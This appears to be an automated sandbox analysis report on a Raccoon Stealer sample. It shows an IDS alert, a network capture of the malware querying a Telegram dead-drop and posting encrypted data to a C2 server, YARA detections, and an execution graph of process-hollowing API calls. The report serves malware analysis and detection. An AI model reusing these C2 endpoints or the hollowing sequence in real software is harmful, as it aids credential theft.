                  .text0x20000x1131a50x113200False0.837859566674data7.39943250791IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rsrc0x1160000x3d40x400False0.392578125data3.09213613055IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x1180000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountry
                  RT_VERSION0x1160580x37cdata
                  DLLImport
                  mscoree.dll_CorExeMain
                  DescriptionData
                  Translation0x0000 0x04b0
                  LegalCopyrightCopyright 2017
                  Assembly Version1.0.0.0
                  InternalNameHospital_project.exe
                  FileVersion1.0.0.0
                  CompanyName
                  LegalTrademarks
                  Comments
                  ProductNameWindowsFormsApplication1
                  ProductVersion1.0.0.0
                  FileDescriptionWindowsFormsApplication1
                  OriginalFilenameHospital_project.exe
                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  01/29/22-00:12:35.293104TCP2034960ET TROJAN Win32.Raccoon Stealer Checkin M68049814194.180.174.147192.168.2.3
                  TimestampSource PortDest PortSource IPDest IP
                  Jan 29, 2022 00:11:23.264348030 CET4974280192.168.2.3188.166.1.115
                  Jan 29, 2022 00:11:23.294958115 CET8049742188.166.1.115192.168.2.3
                  Jan 29, 2022 00:11:23.295171022 CET4974280192.168.2.3188.166.1.115
                  Jan 29, 2022 00:11:23.297174931 CET4974280192.168.2.3188.166.1.115
                  Jan 29, 2022 00:11:23.325984955 CET8049742188.166.1.115192.168.2.3
                  Jan 29, 2022 00:11:55.059446096 CET4974280192.168.2.3188.166.1.115
                  Jan 29, 2022 00:11:55.220033884 CET4974580192.168.2.3188.166.1.115
                  Jan 29, 2022 00:11:55.250454903 CET8049745188.166.1.115192.168.2.3
                  Jan 29, 2022 00:11:55.253822088 CET4974580192.168.2.3188.166.1.115
                  Jan 29, 2022 00:11:55.254281998 CET4974580192.168.2.3188.166.1.115
                  Jan 29, 2022 00:11:55.283435106 CET8049745188.166.1.115192.168.2.3
                  Jan 29, 2022 00:12:27.063874006 CET4974580192.168.2.3188.166.1.115
                  Jan 29, 2022 00:12:27.067521095 CET4978980192.168.2.391.219.236.139
                  Jan 29, 2022 00:12:30.077579975 CET4978980192.168.2.391.219.236.139
                  Jan 29, 2022 00:12:31.222625017 CET4979980192.168.2.391.219.236.139
                  Jan 29, 2022 00:12:34.218528032 CET4979980192.168.2.391.219.236.139
                  Jan 29, 2022 00:12:35.065468073 CET4981480192.168.2.3194.180.174.147
                  Jan 29, 2022 00:12:35.113210917 CET8049814194.180.174.147192.168.2.3
                  Jan 29, 2022 00:12:35.115226030 CET4981480192.168.2.3194.180.174.147
                  Jan 29, 2022 00:12:35.115562916 CET4981480192.168.2.3194.180.174.147
                  Jan 29, 2022 00:12:35.163053036 CET8049814194.180.174.147192.168.2.3
                  Jan 29, 2022 00:12:35.293103933 CET8049814194.180.174.147192.168.2.3
                  Jan 29, 2022 00:12:35.293160915 CET8049814194.180.174.147192.168.2.3
                  Jan 29, 2022 00:12:35.293205023 CET8049814194.180.174.147192.168.2.3
                  Jan 29, 2022 00:12:35.293241978 CET8049814194.180.174.147192.168.2.3
                  Jan 29, 2022 00:12:35.293246031 CET4981480192.168.2.3194.180.174.147
                  Jan 29, 2022 00:12:35.293272018 CET8049814194.180.174.147192.168.2.3
                  Jan 29, 2022 00:12:35.293308020 CET4981480192.168.2.3194.180.174.147
                  Jan 29, 2022 00:12:35.298744917 CET4981580192.168.2.3159.223.25.220
                  Jan 29, 2022 00:12:35.328320026 CET8049815159.223.25.220192.168.2.3
                  Jan 29, 2022 00:12:35.328432083 CET4981580192.168.2.3159.223.25.220
                  Jan 29, 2022 00:12:35.328999996 CET4981580192.168.2.3159.223.25.220
                  Jan 29, 2022 00:12:35.329063892 CET4981580192.168.2.3159.223.25.220
                  Jan 29, 2022 00:12:35.343663931 CET4981480192.168.2.3194.180.174.147
                  Jan 29, 2022 00:12:35.358330965 CET8049815159.223.25.220192.168.2.3
                  Jan 29, 2022 00:12:35.358364105 CET8049815159.223.25.220192.168.2.3
                  Jan 29, 2022 00:12:35.528899908 CET8049815159.223.25.220192.168.2.3
                  Jan 29, 2022 00:12:35.578156948 CET4981580192.168.2.3159.223.25.220
                  Jan 29, 2022 00:12:53.544519901 CET4981480192.168.2.3194.180.174.147
                  Jan 29, 2022 00:12:53.544562101 CET4981580192.168.2.3159.223.25.220
                  • 188.166.1.115
                  • 194.180.174.147
                  • 159.223.25.220
                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.349742188.166.1.11580C:\Windows\SysWOW64\LaunchWinApp.exe
                  TimestampkBytes transferredDirectionData
                  Jan 29, 2022 00:11:23.297174931 CET823OUTGET /hdm3prapor HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  Content-Type: text/plain; charset=UTF-8
                  Host: 188.166.1.115


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.349745188.166.1.11580C:\Windows\SysWOW64\LaunchWinApp.exe
                  TimestampkBytes transferredDirectionData
                  Jan 29, 2022 00:11:55.254281998 CET846OUTGET /hdm3prapor HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  Content-Type: text/plain; charset=UTF-8
                  Host: 188.166.1.115


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  2192.168.2.349814194.180.174.14780C:\Windows\SysWOW64\LaunchWinApp.exe
                  TimestampkBytes transferredDirectionData
                  Jan 29, 2022 00:12:35.115562916 CET9750OUTGET /hdm3prapor HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  Content-Type: text/plain; charset=UTF-8
                  Host: 194.180.174.147
                  Jan 29, 2022 00:12:35.293103933 CET9752INHTTP/1.1 200 OK
                  Server: nginx
                  Date: Fri, 28 Jan 2022 23:12:35 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Set-Cookie: stel_ssid=211f13d22189c86382_14521355821524036754; expires=Sat, 29 Jan 2022 23:12:35 GMT; path=/; samesite=None; secure; HttpOnly
                  Pragma: no-cache
                  Cache-control: no-store
                  Strict-Transport-Security: max-age=35768000
                  Access-Control-Allow-Origin: *
                  Data Raw: 31 31 39 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 68 64 6d 33 70 72 61 70 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 64 6d 33 70 72 61 70 6f 72 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 69 6d 67 2f 74 5f 6c 6f 67 6f 2e 70 6e 67 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 65 6c 65 67 72 61 6d 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 61 31 39 32 31 59 6c 63 35 6d 45 56 36 36 66 4b 61 66 79 61 6a 66 35 56 2b 38 30 55 56 38 74 4e 56 76 41 3d 3d 33 64 2d 76 33 35 22 3e 0a 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 64 6d 33 70 72 61 70 6f 72 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 69 6d 67 2f 74 5f 6c 6f 67 6f 2e 70 6e 67 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 54 65 6c 65 67 72 61 6d 22 3e 0a 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 61 6c 3a 69 6f 73 3a 61 70 70 5f 73 74 6f 72 65 5f 69 64 22 20 63 6f 6e 74 65 6e 74 3d 22 36 38 36 34 34 39 38 30 37 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 61 6c 3a 69 6f 73 3a 61 70 70 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 65 6c 65 67 72 61 6d 20 4d 65 73 73 65 6e 67 65 72 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 61 6c 3a 69 6f 73 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 74 67 3a 2f 2f 72 65 73 6f 6c 76 65 3f 64 6f 6d 61 69 6e 3d 68 64 6d 33 70 72 61 70 6f 72 22 3e 0a 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 61 6c 3a 61 6e 64 72 6f 69 64 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 74 67 3a 2f 2f 72 65 73 6f 6c 76 65 3f 64 6f 6d 61 69 6e 3d 68 64 6d 33 70 72 61 70 6f 72 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70
                  Data Ascii: 119e<!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @hdm3prapor</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta property="og:title" content="hdm3prapor"><meta property="og:image" content="https://telegram.org/img/t_logo.png"><meta property="og:site_name" content="Telegram"><meta property="og:description" content="a1921Ylc5mEV66fKafyajf5V+80UV8tNVvA==3d-v35"><meta property="twitter:title" content="hdm3prapor"><meta property="twitter:image" content="https://telegram.org/img/t_logo.png"><meta property="twitter:site" content="@Telegram"><meta property="al:ios:app_store_id" content="686449807"><meta property="al:ios:app_name" content="Telegram Messenger"><meta property="al:ios:url" content="tg://resolve?domain=hdm3prapor"><meta property="al:android:url" content="tg://resolve?domain=hdm3prapor"><meta prop
                  Jan 29, 2022 00:12:35.293160915 CET9753INData Raw: 65 72 74 79 3d 22 61 6c 3a 61 6e 64 72 6f 69 64 3a 61 70 70 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 65 6c 65 67 72 61 6d 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 61 6c 3a 61 6e 64 72 6f 69 64 3a 70 61 63 6b 61 67 65 22
                  Data Ascii: erty="al:android:app_name" content="Telegram"><meta property="al:android:package" content="org.telegram.messenger"><meta name="twitter:card" content="summary"><meta name="twitter:site" content="@Telegram"><meta name="twitter:description"
                  Jan 29, 2022 00:12:35.293205023 CET9755INData Raw: 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 63 73 73 2f 74 65 6c 65 67 72 61 6d 2e 63 73 73 3f 32 31 35 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61
                  Data Ascii: heet"> <link href="//telegram.org/css/telegram.css?215" rel="stylesheet" media="screen"> </head> <body> <div class="tgme_page_wrap"> <div class="tgme_head_wrap"> <div class="tgme_head"> <a href="//telegram.
                  Jan 29, 2022 00:12:35.293241978 CET9755INData Raw: 68 64 6d 33 70 72 61 70 6f 72 3c 2f 73 74 72 6f 6e 67 3e 20 72 69 67 68 74 20 61 77 61 79 2e 0a 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 74 67 6d 65 5f
                  Data Ascii: hdm3prapor</strong> right away.</div> </div> </div> <div id="tgme_frame_cont"></div> <script type="text/javascript">var protoUrl = "tg:\/\/resolve?domain=hdm3prapor";if (false) { var iframeContEl = document.getElement
                  Jan 29, 2022 00:12:35.293272018 CET9756INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  3192.168.2.349815159.223.25.22080C:\Windows\SysWOW64\LaunchWinApp.exe
                  TimestampkBytes transferredDirectionData
                  Jan 29, 2022 00:12:35.328999996 CET9756OUTPOST / HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  Content-Type: text/plain; charset=UTF-8
                  Content-Length: 128
                  Host: 159.223.25.220
                  Jan 29, 2022 00:12:35.329063892 CET9756OUTData Raw: 54 37 65 4b 4d 6a 6d 38 49 7a 64 6a 32 2f 70 73 6b 57 46 2f 69 6e 2f 59 37 41 79 30 76 78 77 77 59 6f 70 68 7a 5a 4d 6e 56 66 2f 62 72 59 61 4c 30 79 68 76 4f 31 7a 33 71 6b 78 4a 6b 66 6c 50 6c 7a 33 54 4b 51 5a 32 6c 32 58 2f 75 6b 74 6d 32 6d
                  Data Ascii: T7eKMjm8Izdj2/pskWF/in/Y7Ay0vxwwYophzZMnVf/brYaL0yhvO1z3qkxJkflPlz3TKQZ2l2X/uktm2mhCBZ6jUQjP4dLIkxkWBtVhZvXdV49MhprlyNoT9Oo6rA==
                  Jan 29, 2022 00:12:35.528899908 CET9757INHTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Fri, 28 Jan 2022 23:12:35 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Vary: Accept-Encoding
                  Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: a2<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:00:12:08
                  Start date:29/01/2022
                  Path:C:\Users\user\Desktop\qpwx2wT5ky.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\qpwx2wT5ky.exe"
                  Imagebase:0xd10000
                  File size:1128960 bytes
                  MD5 hash:C22C0FDBC19DCD4838709BBACA921F56
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.318536230.0000000004271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000000.00000002.318536230.0000000004271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000003.301171439.0000000004615000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.301171439.0000000004615000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000000.00000002.320185486.000000000468C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.317108118.0000000003170000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.317108118.0000000003170000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: INDICATOR_SUSPICIOUS_DisableWinDefender, Description: Detects executables containing artifcats associated with disabling Widnows Defender, Source: 00000000.00000002.317108118.0000000003170000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD, Description: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF, Source: 00000000.00000002.317108118.0000000003170000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via IExecuteCommand COM object, Source: 00000000.00000002.317108118.0000000003170000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste, Description: Detects executables potentially checking for WinJail sandbox window, Source: 00000000.00000002.317108118.0000000003170000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.301603484.0000000005962000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000003.301092646.000000000452D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.301092646.000000000452D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low

                  Target ID:2
                  Start time:00:12:13
                  Start date:29/01/2022
                  Path:C:\Windows\SysWOW64\LaunchWinApp.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\LaunchWinApp.exe
                  Imagebase:0xa0000
                  File size:33280 bytes
                  MD5 hash:529B7E6E938EA6C3BCA2821EB525BBD7
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000002.00000000.308435428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_Raccoon, Description: Raccoon stealer payload, Source: 00000002.00000000.308435428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_Raccoon, Description: Raccoon stealer payload, Source: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000002.00000000.308711684.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_Raccoon, Description: Raccoon stealer payload, Source: 00000002.00000000.308711684.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000002.00000000.309062654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_Raccoon, Description: Raccoon stealer payload, Source: 00000002.00000000.309062654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000002.00000000.308140277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_Raccoon, Description: Raccoon stealer payload, Source: 00000002.00000000.308140277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000002.00000000.467738406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_Raccoon, Description: Raccoon stealer payload, Source: 00000002.00000000.467738406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000002.00000000.309415722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_Raccoon, Description: Raccoon stealer payload, Source: 00000002.00000000.309415722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000002.00000000.467293779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_Raccoon, Description: Raccoon stealer payload, Source: 00000002.00000000.467293779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  Reputation:low

                  Target ID:16
                  Start time:00:13:29
                  Start date:29/01/2022
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5980 -s 796
                  Imagebase:0x160000
                  File size:434592 bytes
                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Reset < >

                    Execution Graph

                    Execution Coverage:14.5%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:11.8%
                    Total number of Nodes:204
                    Total number of Limit Nodes:11
                    execution_graph 16118 6aa42f8 16122 6aa4338 16118->16122 16126 6aa432c 16118->16126 16123 6aa438d MoveFileExA 16122->16123 16125 6aa447f 16123->16125 16128 6aa438d 16126->16128 16127 6aa443a MoveFileExA 16129 6aa447f 16127->16129 16128->16127 16128->16128 16179 6aa5dd8 16184 6aa5df8 16179->16184 16185 6aa60ca 16179->16185 16190 6aa5e10 16179->16190 16195 6aa5e00 16179->16195 16201 6aa60dc 16179->16201 16187 6aa5e38 16185->16187 16186 6aa61ac 16186->16184 16187->16186 16206 6aa83a8 16187->16206 16210 6aa8398 16187->16210 16192 6aa5e38 16190->16192 16191 6aa61ac 16191->16184 16192->16191 16193 6aa83a8 11 API calls 16192->16193 16194 6aa8398 11 API calls 16192->16194 16193->16192 16194->16192 16197 6aa5d8f 16195->16197 16198 6aa5e06 16195->16198 16196 6aa61ac 16196->16184 16197->16184 16198->16196 16199 6aa83a8 11 API calls 16198->16199 16200 6aa8398 11 API calls 16198->16200 16199->16198 16200->16198 16203 6aa5e38 16201->16203 16202 6aa61ac 16202->16184 16203->16202 16204 6aa83a8 11 API calls 16203->16204 16205 6aa8398 11 API calls 16203->16205 16204->16203 16205->16203 16215 6aa83e8 16206->16215 16219 6aa83d9 16206->16219 16207 6aa83cd 16207->16187 16211 6aa83a8 16210->16211 16213 6aa83e8 11 API calls 16211->16213 16214 6aa83d9 11 API calls 16211->16214 16212 6aa83cd 16212->16187 16213->16212 16214->16212 16224 6aa84f0 16215->16224 16241 6aa8500 16215->16241 16216 6aa8408 16216->16207 16220 6aa83e8 16219->16220 16222 6aa84f0 11 API calls 16220->16222 16223 6aa8500 11 API calls 16220->16223 16221 6aa8408 16221->16207 16222->16221 16223->16221 16235 6aa8525 16224->16235 16258 6aa9b2b 16224->16258 16263 6aa8c95 16224->16263 16268 6aa8cb4 16224->16268 16273 6aaa7b7 16224->16273 16278 6aa8c91 16224->16278 16283 6aa9ddf 16224->16283 16288 6aa8da6 16224->16288 16293 6aa9d80 16224->16293 16297 6aa8c8d 16224->16297 16302 6aaab0d 16224->16302 16307 6aaa54c 16224->16307 16311 6aa992c 16224->16311 16315 6aa8c89 16224->16315 16321 6aa8d48 16224->16321 16326 6aaa968 16224->16326 16235->16216 16242 6aa9b2b 2 API calls 16241->16242 16243 6aaa968 3 API calls 16241->16243 16244 6aa8d48 2 API calls 16241->16244 16245 6aa8c89 2 API calls 16241->16245 16246 6aa992c 2 API calls 16241->16246 16247 6aaa54c 2 API calls 16241->16247 16248 6aaab0d 2 API calls 16241->16248 16249 6aa8c8d 2 API calls 16241->16249 16250 6aa9d80 2 API calls 16241->16250 16251 6aa8da6 2 API calls 16241->16251 16252 6aa8525 16241->16252 16253 6aa9ddf 2 API calls 16241->16253 16254 6aa8c91 2 API calls 16241->16254 16255 6aaa7b7 2 API calls 16241->16255 16256 6aa8cb4 2 API calls 16241->16256 16257 6aa8c95 2 API calls 16241->16257 16242->16252 16243->16252 16244->16252 16245->16252 16246->16252 16247->16252 16248->16252 16249->16252 16250->16252 16251->16252 16252->16216 16253->16252 16254->16252 16255->16252 16256->16252 16257->16252 16259 6aa9b37 16258->16259 16331 6aac6d9 16259->16331 16336 6aac6e0 16259->16336 16260 6aa9ba3 16260->16235 16264 6aa8c84 16263->16264 16265 6aa8d9f 16264->16265 16340 6aac1a0 16264->16340 16344 6aac194 16264->16344 16265->16235 16269 6aa8c84 16268->16269 16269->16268 16270 6aa8d9f 16269->16270 16271 6aac1a0 CreateProcessA 16269->16271 16272 6aac194 CreateProcessA 16269->16272 16270->16235 16271->16270 16272->16270 16274 6aaa7c7 16273->16274 16276 6aac6d9 WriteProcessMemory 16274->16276 16277 6aac6e0 WriteProcessMemory 16274->16277 16275 6aaa810 16276->16275 16277->16275 16279 6aa8c84 16278->16279 16280 6aa8d9f 16279->16280 16281 6aac1a0 CreateProcessA 16279->16281 16282 6aac194 CreateProcessA 16279->16282 16280->16235 16281->16280 16282->16280 16284 6aa9c40 16283->16284 16284->16283 16285 6aa9ec6 16284->16285 16348 6aac888 16284->16348 16352 6aac881 16284->16352 16289 6aa8d7e 16288->16289 16290 6aa8d9f 16289->16290 16291 6aac1a0 CreateProcessA 16289->16291 16292 6aac194 CreateProcessA 16289->16292 16290->16235 16291->16290 16292->16290 16356 6aac528 16293->16356 16360 6aac521 16293->16360 16294 6aa9d9a 16298 6aa8c84 16297->16298 16299 6aa8d9f 16298->16299 16300 6aac1a0 CreateProcessA 16298->16300 16301 6aac194 CreateProcessA 16298->16301 16299->16235 16300->16299 16301->16299 16305 6aac6d9 WriteProcessMemory 16302->16305 16306 6aac6e0 WriteProcessMemory 16302->16306 16303 6aaab95 16304 6aa9774 16304->16302 16304->16303 16305->16304 16306->16304 16309 6aac1a0 CreateProcessA 16307->16309 16310 6aac194 CreateProcessA 16307->16310 16308 6aaa5d3 16308->16235 16309->16308 16310->16308 16313 6aac528 SetThreadContext 16311->16313 16314 6aac521 SetThreadContext 16311->16314 16312 6aa9943 16313->16312 16314->16312 16317 6aa8c84 16315->16317 16316 6aa8d9f 16316->16316 16317->16315 16317->16316 16318 6aaa5d3 16317->16318 16319 6aac1a0 CreateProcessA 16317->16319 16320 6aac194 CreateProcessA 16317->16320 16318->16235 16319->16318 16320->16318 16322 6aa8d7e 16321->16322 16323 6aa8d9f 16322->16323 16324 6aac1a0 CreateProcessA 16322->16324 16325 6aac194 CreateProcessA 16322->16325 16323->16235 16324->16323 16325->16323 16364 6aac94a 16326->16364 16369 6aacd40 16326->16369 16373 6aacd48 16326->16373 16327 6aaa979 16332 6aac6a0 16331->16332 16333 6aac6df WriteProcessMemory 16331->16333 16332->16260 16335 6aac77f 16333->16335 16335->16260 16337 6aac728 WriteProcessMemory 16336->16337 16339 6aac77f 16337->16339 16339->16260 16341 6aac229 16340->16341 16341->16341 16342 6aac38e CreateProcessA 16341->16342 16343 6aac3eb 16342->16343 16343->16343 16345 6aac1a0 16344->16345 16345->16345 16346 6aac38e CreateProcessA 16345->16346 16347 6aac3eb 16346->16347 16347->16347 16349 6aac8c8 VirtualAllocEx 16348->16349 16351 6aac905 16349->16351 16351->16284 16353 6aac888 VirtualAllocEx 16352->16353 16355 6aac905 16353->16355 16355->16284 16357 6aac56d SetThreadContext 16356->16357 16359 6aac5b5 16357->16359 